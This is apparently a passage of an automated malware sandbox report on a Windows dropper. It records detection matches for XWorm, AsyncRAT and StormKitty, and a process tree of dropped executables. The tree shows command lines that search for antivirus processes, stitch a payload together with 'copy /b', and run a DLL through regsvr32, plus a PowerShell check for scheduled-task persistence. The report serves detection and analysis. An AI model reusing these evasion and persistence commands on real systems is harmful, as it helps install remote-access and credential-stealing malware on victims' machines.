Source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.1c730000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.1c730000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000022.00000002.4535552791.000000001C730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: DbCMTMgeJo.exe	Static PE information: Section: ZLIB complexity 0.9986959317835366
Source: DbCMTMgeJo.exe	Static PE information: Section: oetrsojv ZLIB complexity 0.994232223903177
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9978393222070845
Source: skotes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9978393222070845
Source: random[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003325105444785
Source: c153ad0ce0.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003325105444785
Source: random[1].exe0.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 63460ff8c7.exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe1.7.dr	Static PE information: Section: ZLIB complexity 1.0003080638801263
Source: random[1].exe1.7.dr	Static PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
Source: 1639401074.exe.7.dr	Static PE information: Section: ZLIB complexity 1.0003080638801263
Source: 1639401074.exe.7.dr	Static PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
Source: random[2].exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 8ec89b23d4.exe.7.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: 5ec73896e9.exe.7.dr, aNQaxxDiYjXg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: random[1].exe.7.dr, MDBp674GwRHUPSSZoY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: c153ad0ce0.exe.7.dr, MDBp674GwRHUPSSZoY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[2].exe1.7.dr, aNQaxxDiYjXg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, MDBp674GwRHUPSSZoY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5ec73896e9.exe.7.dr, uBQRQemRwragayxWIgNspKbnCcaXv.cs	Base64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
Source: random[1].exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: c153ad0ce0.exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[2].exe1.7.dr, uBQRQemRwragayxWIgNspKbnCcaXv.cs	Base64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Settings.cs	Base64 encoded string: '/i32gtMLqGCTGRoLTU9pFCcSzU7e2Cj68LKBdNWQIT178er/KL1bXecVup1u73XU', 'LEahl8USOPil8YXnMkEp4KLJkNiStXZX7s6/7LbhaFROa8U6PfWnCHXA+ngClX7g'
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Settings.cs	Base64 encoded string: '/i32gtMLqGCTGRoLTU9pFCcSzU7e2Cj68LKBdNWQIT178er/KL1bXecVup1u73XU', 'LEahl8USOPil8YXnMkEp4KLJkNiStXZX7s6/7LbhaFROa8U6PfWnCHXA+ngClX7g'

Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@104/119@97/13

Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9RKFGXU6.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\AverageHorse
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\f35pmRFzPiiasEf1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

File created: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: DbCMTMgeJo.exe, 00000000.00000003.2076429875.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075621912.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2090979938.0000000005DC4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DbCMTMgeJo.exe	Virustotal: Detection: 55%
Source: DbCMTMgeJo.exe	ReversingLabs: Detection: 55%

Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

File read: C:\Users\user\Desktop\DbCMTMgeJo.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DbCMTMgeJo.exe "C:\Users\user\Desktop\DbCMTMgeJo.exe"
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process created: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe "C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe"
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process created: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe "C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe"
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5256 -ip 5256
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 956
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe "C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe "C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe"
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp "C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp" /SL5="$50482,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp "C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp" /SL5="$80484,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe "C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe"
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe"
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB10.tmp" "c:\Users\user\AppData\Local\Temp\gaqlxgdr\CSCB36A130CAC24B60A582C1D3CEEF98E.TMP"
